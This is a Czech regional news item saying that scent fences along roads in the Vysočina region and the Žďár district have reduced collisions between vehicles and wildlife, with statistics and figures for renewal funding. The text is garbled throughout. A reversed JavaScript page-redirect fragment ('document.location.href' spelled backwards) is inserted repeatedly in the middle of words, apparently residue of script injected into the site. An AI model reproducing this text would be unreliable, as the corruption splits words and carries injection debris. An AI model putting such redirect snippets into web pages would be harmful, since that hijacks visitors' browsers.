Rainbow page separator

Pachové ohradníky na Žďársku snížily počet nehod se zvěří

Čtvrtek, 14. března 2019

Žďársko / Snížení střetů zvěře s au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily eviduje od roku 2009 na sledovaných silnicích Kraj Vysočina. Dopomohly k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu také takzvané pachové ohradníky. Speciální pěna je umístěna ideálně v doporučeném rozmezí podél silnice. Zapáchá jako predá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor a zvěř odrazuje od vstupu na označená místa. Pěna se nanáší na kolíky, keře nebo stromy, přičemž v ní umístěný koncentrát účinkuje zhruba čtvrt roku.
„Podle našich statistik jde v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to období až o čtyřicetiprocentní snížení střetů. Oproti roku 2017 bylo loni evidováno o devatenáct procent méně dopravních nehod včetně kolizí se zvěří,“ informoval radní Kraje Vysočina pro oblast životního prostředí a zemědělství Martin Hyský. S ohledem na prokazatelný efekt pachových ohradníků uvolní kraj na jejich obnovu v délce 130 kilometrů celkem 250 tisíc korun.
Konkrétně ve žďárském okrese došlo loni oproti roku 2009 ke snížení počtu nehod se zvěří o čtrnáct procent.
Obnovu pachových ohradníků u vybraných silnic le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos pilotně podpoří Fond zábrany škod spravovaný Českou kanceláří pojistitelů. V minulých letech byla realizace opatření spolufinancována Nadací Generali.